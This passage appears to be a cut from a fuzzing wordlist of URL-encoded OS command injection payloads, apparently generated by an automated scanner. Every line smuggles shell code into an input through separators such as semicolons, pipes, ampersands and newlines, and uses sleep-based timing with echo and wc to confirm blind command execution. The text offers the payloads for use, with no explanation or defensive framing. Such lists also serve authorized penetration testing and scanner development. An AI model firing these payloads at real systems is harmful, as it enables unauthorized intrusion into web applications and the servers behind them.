201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%7C%20%5B%201%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%202%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%203%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%204%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%205%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%206%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%207%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%208%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%209%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%7C%20%5B%201%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%202%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%203%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%204%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%205%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%206%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%207%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%208%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%209%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%7C%20%5B%201%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%202%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%203%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%204%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%205%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%206%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%207%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%208%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%209%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%7C%20%5B%201%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%202%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%203%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%204%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%205%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%206%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%207%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%208%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%